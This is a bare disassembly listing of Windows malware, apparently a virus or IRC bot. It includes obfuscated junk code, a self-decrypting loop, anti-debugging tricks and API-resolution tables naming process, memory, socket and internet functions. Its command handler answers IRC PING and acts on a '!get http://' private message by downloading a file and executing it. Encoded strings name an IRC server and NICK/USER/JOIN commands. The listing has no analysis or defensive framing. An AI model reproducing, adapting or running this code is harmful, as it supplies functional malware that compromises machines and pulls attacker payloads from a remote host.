add dl, dh
loop loc_40C920
loc_40C929: ; CODE XREF: __u_____:0040C52A�j
; sub_40C52F+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_40C52F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C932 proc near ; CODE XREF: sub_40C52F+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_40C3FE
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_40C94B: ; CODE XREF: sub_40C32D+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_40C973: ; CODE XREF: sub_40C32D+6B�j
; sub_40C32D+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_40C97F: ; CODE XREF: sub_40C32D+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_40C932 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 0DB81234h
dd 6003694Dh, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 36946DFh
dd 8FB8B1EBh, 0E803694Ch, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 7060203h, 0C92D0501h
dd 0DD3A4B56h, 0E3D815FFh, 0FF8B006Dh, 125h dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 0F5h dup(0)
dd offset loc_40A0D4
dd 1308h dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_41201D
jmp short $+2
nop
cmc
nop
call sub_4120C2
mov ebp, 12FFC0h ; DATA XREF: sub_41201D+6�w
; sub_417059+6�w
cmc
jmp loc_412054
; =============== S U B R O U T I N E =======================================
sub_41201D proc near ; CODE XREF: __u_____:00412003�p
push dword ptr fs:0
mov dword ptr ds:loc_412012+1, ebp
stc
mov fs:0, esp
xor ebx, ebx
push 80000000h
push ebx
push ebx
push 10h
push ebx
push 80000000h
push 80000000h
push 4000h
call ds:dword_40700C ; LoadLibraryA
loc_412054: ; CODE XREF: __u_____:00412018�j
stc
sub eax, eax
loc_412057: ; CODE XREF: sub_41201D+40�j
dec al
or al, al
jz short loc_412061
jnz short loc_412057
jmp short near ptr loc_4120C6+2
; ---------------------------------------------------------------------------
loc_412061: ; CODE XREF: sub_41201D+3E�j
clc
jmp short $+2
xchg ebx, ebx
mov edx, edx
stc
call sub_412070
nop
stc
sub_41201D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412070 proc near ; CODE XREF: sub_41201D+4C�p
pop edx
xchg ebx, ebx
nop
cmc
clc
sub edx, 0FFFFFF9Bh
mov esi, 29CCh
xchg ebx, ebx
mov ebx, 9Ch
jmp short $+2
push edx
mov edx, edx
xchg ebx, ebx
mov ecx, ecx
loc_412091: ; CODE XREF: sub_412070+3B�j
mov al, [edx]
mov ecx, ecx
mov ecx, ecx
cld
stc
xor ax, bx
nop
cld
xchg al, [edx]
stc
cld
add edx, 1
dec esi
jmp short $+2
cmp esi, 0
ja short loc_412091
pop edx
cld
mov ebx, [ebp-8]
mov fs:0, ebx
xchg ebx, ebx
clc
clc
clc
leave
jmp edx
sub_412070 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp short $+2
; =============== S U B R O U T I N E =======================================
sub_4120C2 proc near ; CODE XREF: __u_____:0041200D�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
loc_4120C6: ; CODE XREF: sub_41201D+42�j
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_4120C2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 89h, 0C9h
; ---------------------------------------------------------------------------
jmp short $+2
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_412120
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_412114
mov ebx, [eax+29C1h]
jmp short loc_41211E
; ---------------------------------------------------------------------------
loc_412114: ; CODE XREF: __u_____:0041210A�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_41211E: ; CODE XREF: __u_____:00412112�j
mov ebx, [ebx]
loc_412120: ; CODE XREF: __u_____:004120F2�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 80D8h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_41214E
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_41214E: ; CODE XREF: __u_____:00412147�j
and ebx, 0FFFFF000h
loc_412154: ; CODE XREF: __u_____:00412163�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_412165
loc_41215D: ; CODE XREF: __u_____:00412172�j
sub ebx, 100h
jnz short loc_412154
loc_412165: ; CODE XREF: __u_____:0041215B�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_41215D
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_41217F: ; CODE XREF: __u_____:loc_412193�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_412193
cmp dword ptr [eax+5], 6441636Fh
jz short loc_412198
loc_412193: ; CODE XREF: __u_____:00412188�j
loop loc_41217F
pop ecx
jmp short loc_4121C3
; ---------------------------------------------------------------------------
loc_412198: ; CODE XREF: __u_____:00412191�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_41220A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_412251
loc_4121C3: ; CODE XREF: __u_____:00412196�j
; sub_412251+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_4121EF
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_4121EF: ; CODE XREF: sub_412251-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_412251
; ---------------------------------------------------------------------------
or al, ah
push ebx
mov ecx, 2889h
mov ebx, edx
loc_4121FB: ; CODE XREF: __u_____:00412206�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_4121FB
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41220A: ; CODE XREF: __u_____:004121C1�j
call near ptr loc_412219+2
inc ebx
insb
outsd
jnb short near ptr loc_412276+3
dec eax
popa
outsb
db 64h
insb
loc_412219: ; CODE XREF: __u_____:loc_41220A�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_412235+1
inc ebx
jb short loc_412291
popa
jz short near ptr loc_412293+1
inc ebp
jbe short near ptr loc_412293+4
outsb
jz short loc_412276
loc_412235: ; CODE XREF: __u_____:00412224�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_412251
inc edi
db 65h
jz short near ptr loc_412293+1
popa
jnb short near ptr loc_4122BD+2
inc ebp
jb short near ptr loc_4122BD+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_412251 proc near ; CODE XREF: __u_____:0041223F�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004121C3 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00412607 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_412632
test eax, eax
jz loc_4121C3
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_412607
loc_412276: ; CODE XREF: __u_____:00412233�j
; __u_____:00412212�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_412293
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_412291: ; CODE XREF: __u_____:0041222A�j
jmp short loc_41229A
; ---------------------------------------------------------------------------
loc_412293: ; CODE XREF: sub_412251+2C�j
; __u_____:0041222D�j ...
and dword ptr [ebp+101598h], 0
loc_41229A: ; CODE XREF: sub_412251:loc_412291�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_4122BD: ; CODE XREF: __u_____:00412249�j
; __u_____:0041224C�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_41266F
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_4123B6
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_412607
xchg eax, edi
lea esi, [ebp+7A28C600h]
xchg ch, bh
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_412607
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_412607
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_4123A6
jmp loc_412607
; ---------------------------------------------------------------------------
loc_4123A6: ; CODE XREF: sub_412251+14B�p
; sub_412251+162�j
push 1
pop ecx
jecxz short locret_4123B5
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_4123A6
; ---------------------------------------------------------------------------
locret_4123B5: ; CODE XREF: sub_412251+158�j
retn
; ---------------------------------------------------------------------------
loc_4123B6: ; CODE XREF: sub_412251+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_412607
call near ptr loc_4123CD+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_4123CD: ; CODE XREF: sub_412251+172�p
add bh, bh
sub_412251 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_41266F
cmp dword ptr [ebp+103F2Eh], 0
jz loc_412607
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_412607
mov ecx, [ebp+103F06h]
jecxz short loc_412456
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_412456
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_412456: ; CODE XREF: __u_____:0041243A�j
; __u_____:0041244B�j
call sub_412613
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_41249F: ; CODE XREF: __u_____:004124A8�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_41249F
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_412607
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h, 54h, 6Ah
dd 0FFFF6A20h, 103F1A95h, 5FC08500h, 4FE83475h, 0E8000001h
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 50E85700h
dd 0FF000005h, 104288B5h, 9E95FF00h, 5700103Eh, 3E6295FFh
dd 6A0010h, 95FF026Ah, 103E92h, 128B9h, 0E12B9700h, 54240C89h
dd 0D695FF57h, 3300103Eh, 72A583F6h, 103Fh, 95FF5754h
dd 103EDAh, 6674C085h, 4FE8346h, 74FFEE72h, 6A0824h, 95FF2A6Ah
dd 103ED2h, 0DC74C085h, 588E893h, 0C9330000h, 393AE391h
dd 103F7285h, 81327500h, 6324247Ch, 74737273h, 0AFC18128h
dd 5000000Eh, 51565054h, 0FF535050h, 103E8A95h, 59C08500h
dd 74FF0F74h, 858F0824h, 103F72h, 0FFFDB5E8h, 95FF53FFh
dd 103E62h, 0C4818EEBh, 128h, 6295FF57h
db 3Eh, 10h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_412251
loc_412607: ; CODE XREF: sub_412251+1F�j
; sub_412251+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_4121C3
; END OF FUNCTION CHUNK FOR sub_412251
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_412613 proc near ; CODE XREF: __u_____:loc_412456�p
; sub_412632+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_412613 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
align 2
; =============== S U B R O U T I N E =======================================
sub_412632 proc near ; CODE XREF: sub_412251+9�p
; __u_____:loc_41302D�p
xor ecx, ecx
call sub_412613
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_412632 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 58h
dd 28005858h, 73000033h, 0Eh, 2 dup(0)
dd 0C0000000h, 29h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_41266F proc near ; CODE XREF: sub_412251+7C�p
; __u_____:004123E5�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_41267A: ; CODE XREF: sub_41266F+E�j
lodsb
test al, al
jnz short loc_41267A
loop sub_41266F
retn
sub_41266F endp
; ---------------------------------------------------------------------------
dw 958Dh
dd 101985h, 0C695FF52h, 8900103Eh, 10428885h, 16E800h
dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6E95FF50h, 8900103Eh, 10428C85h, 425CC300h
dd 4E657361h, 64656D61h, 656A624Fh, 5C737463h, 65537456h
dd 6C007463h, 6C727473h, 43006E65h, 74616572h, 6C694665h
dd 43004165h, 74616572h, 6C694665h, 70614D65h, 676E6970h
dd 72430041h, 65746165h, 636F7250h, 41737365h, 65724300h
dd 52657461h, 746F6D65h, 72685465h, 646165h, 61657243h
dd 68546574h, 64616572h, 65724300h, 54657461h, 686C6F6Fh
dd 33706C65h, 616E5332h, 6F687370h, 78450074h, 68547469h
dd 64616572h, 6C694600h, 6D695465h, 536F5465h, 65747379h
dd 6D69546Dh, 72460065h, 694C6565h, 72617262h, 65470079h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 74654700h
dd 656C6946h, 657A6953h, 74654700h, 656C6946h, 656D6954h
dd 74654700h, 75646F4Dh, 6148656Ch, 656C646Eh, 65470041h
dd 6D655474h, 6C694670h, 6D614E65h, 47004165h, 65547465h
dd 6150706Dh, 416874h, 56746547h, 69737265h, 47006E6Fh
dd 65567465h, 6F697372h, 4178456Eh, 74654700h, 756C6F56h
dd 6E49656Dh, 6D726F66h, 6F697461h, 4C00416Eh, 4C64616Fh
dd 61726269h, 417972h, 5670614Dh, 4F776569h, 6C694666h
dd 704F0065h, 69466E65h, 614D656Ch, 6E697070h, 4F004167h
dd 506E6570h, 65636F72h, 50007373h, 65636F72h, 32337373h
dd 73726946h, 72500074h, 7365636Fh, 4E323373h, 747865h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 53004173h
dd 69467465h, 6954656Ch, 5300656Dh, 7065656Ch, 73795300h
dd 546D6574h, 54656D69h, 6C69466Fh, 6D695465h, 6E550065h
dd 5670616Dh, 4F776569h, 6C694666h, 69560065h, 61757472h
dd 6C6C416Ch, 5700636Fh, 65746972h, 656C6946h, 41744E00h
dd 73756A64h, 69725074h, 656C6976h, 54736567h, 6E656B6Fh
dd 43744E00h, 74616572h, 6C694665h, 744E0065h, 61657243h
dd 72506574h, 7365636Fh, 744E0073h, 61657243h, 72506574h
dd 7365636Fh, 784573h, 7243744Eh, 65746165h, 74636553h
dd 6E6F69h, 7243744Eh, 65746165h, 72657355h, 636F7250h
dd 737365h, 614D744Eh, 65695670h, 53664F77h, 69746365h
dd 4E006E6Fh, 65704F74h, 6C69466Eh, 744E0065h, 6E65704Fh
dd 636F7250h, 54737365h, 6E656B6Fh, 4F744E00h, 536E6570h
dd 69746365h, 4E006E6Fh, 6F725074h, 74636574h, 74726956h
dd 4D6C6175h, 726F6D65h, 744E0079h, 72657551h, 666E4979h
dd 616D726Fh, 6E6F6974h, 656B6F54h, 744E006Eh, 74697257h
dd 72695665h, 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h
dd 646F6369h, 72745365h, 54676E69h, 736E416Fh, 72745369h
dd 676E69h, 53415357h, 74726174h, 63007075h, 65736F6Ch
dd 6B636F73h, 63007465h, 656E6E6Fh, 67007463h, 6F687465h
dd 79627473h, 656D616Eh, 63657200h, 65730076h, 7300646Eh
dd 656B636Fh, 6E490074h, 6E726574h, 6C437465h, 4865736Fh
dd 6C646E61h, 6E490065h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 65746E49h, 74656E72h
dd 6E65704Fh, 6E490041h, 6E726574h, 704F7465h, 72556E65h
dd 4900416Ch, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 41564441h, 32334950h, 4C4C442Eh, 67655200h, 736F6C43h
dd 79654B65h, 67655200h, 6E65704Fh, 4579654Bh, 52004178h
dd 75516765h, 56797265h, 65756C61h, 417845h, 53676552h
dd 61567465h, 4565756Ch, 56004178h, 26AF633h, 0D48B5656h
dd 0FF52016Ah, 0FF561872h, 10428C95h, 56C48B00h, 56505656h
dd 0FF1870FFh, 103EFA95h, 10C48300h, 8C25Eh, 2BFB498Dh
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 3F2295FFh, 0C4830010h
dd 2A95FF0Ch, 8300103Fh, 8DC308C4h, 103E3095h, 6AC93300h
dd 30685200h, 8B003200h, 6A5151C4h, 6A515040h, 8C08318h
dd 500E6A54h, 3F1E95FFh, 0C4830010h, 85D23320h, 0C2990FC0h
dd 2358DAF7h, 3357C3C2h, 0FFC1E8FFh, 840FFFFFh, 0A5h, 73286850h
dd 0D48B0000h, 0CC8B006Ah, 68406Ah, 6A001000h, 6A5202h
dd 732868h, 51006A00h, 95FF5053h, 103F12h, 95FF595Fh, 103E62h
dd 7174FF85h, 15908D8Bh, 0CE30010h, 1000958Dh, 0D1030010h
dd 0D2FF5357h, 3EFE858Bh, 8F8D0010h, 2916h, 0FFFF2BE8h
dd 16858BFFh, 8D00103Fh, 29638Fh, 0FF1AE800h, 858BFFFFh
dd 103F02h, 296A8F8Dh, 9E80000h, 8BFFFFFFh, 103F0685h
dd 74C08500h, 778F8D20h, 0E8000029h, 0FFFFFEF4h, 3F0E858Bh
dd 0C0850010h, 8F8D0B74h, 2984h, 0FFFEDFE8h, 5FC78BFFh
dd 0E855C3h, 5D000000h, 1B24ED81h, 0C9330010h, 1EAF858Dh
dd 54510010h, 51505151h, 8E95FF51h, 8700103Eh, 95FF2404h
dd 103E62h, 4C25Dh, 0E855h, 815D0000h, 101B53EDh, 8DFF6A00h
dd 101B1E95h, 0CD525000h, 2A002420h, 0CC48300h, 6485C766h
dd 0CD00101Bh, 6685C720h, 2400101Bh, 5D002A00h, 581A6AC3h
dd 9E8h, 61428D00h, 75C9FEAAh, 9569C3F0h, 103F7Ch, 8088405h
dd 7C958942h, 0F700103Fh, 0E855C3E2h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101BADh
mov ebx, [ebp+103F80h]
cmp dword ptr [esp+8], 0
jz loc_412D51
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+103EB6h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_412CBE+1
push esi
push edx
push edx
loc_412CBE: ; CODE XREF: __u_____:00412CB6�p
add [edi-1], dl
xchg eax, ebp
mov dl, 3Eh
adc [eax], al
xor ecx, ecx
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr [ebp+103E7Eh]
xchg eax, esi
test esi, esi
jz short loc_412D41
loc_412CE6: ; CODE XREF: __u_____:00412D14�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr [ebp+103F5Eh]
pop ecx
test eax, eax
jz short loc_412D16
jecxz short loc_412D16
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr [ebp+103EF6h]
pop ecx
test eax, eax
jnz short loc_412CE6
loc_412D16: ; CODE XREF: __u_____:00412CFE�j
; __u_____:00412D00�j
push esi
call dword ptr [ebp+103E62h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+103E86h]
loc_412D41: ; CODE XREF: __u_____:00412CE4�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+103F4Eh]
loc_412D51: ; CODE XREF: __u_____:00412C92�j
push ebx
call dword ptr [ebp+103F4Eh]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_412D62
inc esi
loc_412D62: ; CODE XREF: __u_____:00412D5F�j
mov ecx, [ebp+10158Ch]
jecxz short loc_412D83
lea edx, [ebp+101000h]
add edx, ecx
push esi
call edx
test al, al
js loc_412E9C
jz loc_412E93
loc_412D83: ; CODE XREF: __u_____:00412D68�j
cmp byte ptr [esi], 3Ah
jnz short loc_412D98
loc_412D88: ; CODE XREF: __u_____:00412D95�j
inc esi
cmp byte ptr [esi], 0
jz loc_412E93
cmp byte ptr [esi], 20h
jnz short loc_412D88
inc esi
loc_412D98: ; CODE XREF: __u_____:00412D86�j
cmp dword ptr [esi], 474E4950h
jnz short loc_412DE2
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+103F46h]
pop ecx
cmp eax, ecx
jnz loc_412E9C
lea eax, [ebp+101EA3h]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+103F46h]
cmp eax, 0Ch
jnz loc_412E9C
jmp loc_412E93
; ---------------------------------------------------------------------------
loc_412DE2: ; CODE XREF: __u_____:00412D9E�j
cmp dword ptr [esi], 56495250h
jnz loc_412E93
add esi, 8
loc_412DF1: ; CODE XREF: __u_____:00412DFC�j
lodsb
cmp al, 0Dh
jz loc_412E93
cmp al, 20h
jnz short loc_412DF1
lodsb
cmp al, 3Ah
jnz loc_412E93
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_412E93
lodsb
cmp al, 20h
jnz short loc_412E95
cmp dword ptr [esi-1], 74746820h
jnz short loc_412E93
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_412E93
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr [ebp+103EE6h]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_412E51+2
inc esp
outsd
ja short loc_412EBC
insb
outsd
popa
loc_412E51: ; CODE XREF: __u_____:00412E45�p
db 64h
add bh, bh
xchg eax, ebp
push esi
aas
adc [eax], al
test eax, eax
jz short loc_412E93
xor ecx, ecx
mov [ebp+103F80h], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+103F5Ah]
lea edx, [ebp+101BA7h]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
loc_412E93: ; CODE XREF: __u_____:00412D7D�j
; __u_____:00412D8C�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_412E95: ; CODE XREF: __u_____:00412E17�j
or byte ptr [ebp+10157Fh], 1
loc_412E9C: ; CODE XREF: __u_____:00412D77�j
; __u_____:00412DB7�j ...
stc
retn
; ---------------------------------------------------------------------------
push 1
push 1
push dword ptr [ebx]
push dword ptr [ebx+4]
call dword ptr ds:5A74C085h ; CODE XREF: __u_____:0041300D�p
xor ebx, ebx
mov edx, eax
mov bl, 0Bh
add edx, [eax+3Ch]
lea esi, [ebp+101DCBh]
loc_412EBC: ; CODE XREF: __u_____:00412E4C�j
mov edi, [edx+10Ch]
mov ecx, [edx+108h]
add edi, eax
sub ecx, ebx
loc_412ECC: ; CODE XREF: __u_____:00412ED5�j
pusha
mov ecx, ebx
repe cmpsb
popa
jz short loc_412ED9
inc edi
loop loc_412ECC
jmp short locret_412F07
; ---------------------------------------------------------------------------
loc_412ED9: ; CODE XREF: __u_____:00412ED2�j
add edi, 0Fh
push ebx
mov ecx, esp
push edi
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push 0FFFFFFFFh
call dword ptr [ebp+103F22h]
mov ecx, [ebp+103E96h]
add esp, 0Ch
sub ecx, edi
sub ecx, 7
mov dword ptr [edi], 0E8006Ah
mov [edi+3], ecx
locret_412F07: ; CODE XREF: __u_____:00412ED7�j
retn
; ---------------------------------------------------------------------------
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
dd 5000h, 72700000h, 6D69786Fh, 6372692Eh, 616C6167h, 702E7978h
dd 494E006Ch, 68204B43h, 666A6E6Fh, 0A6F637Ah, 52455355h
dd 4F4A6C20h, 26204E49h, 74726976h, 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101EB5h
mov byte ptr [ebp+10157Fh], 0
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz short loc_412FDD
push 1Eh
mov esi, [ebp+103E72h]
pop ecx
loc_412FAA: ; CODE XREF: __u_____:loc_412FD9�j
lodsb
cmp al, 2Eh
jnz short loc_412FD9
cmp word ptr [esi], 1DFFh
jnz short loc_412FD9
lea edi, [ebp+103F76h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+1038ECh]
pop dword ptr [ebp+103912h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_412FD9: ; CODE XREF: __u_____:00412FAD�j
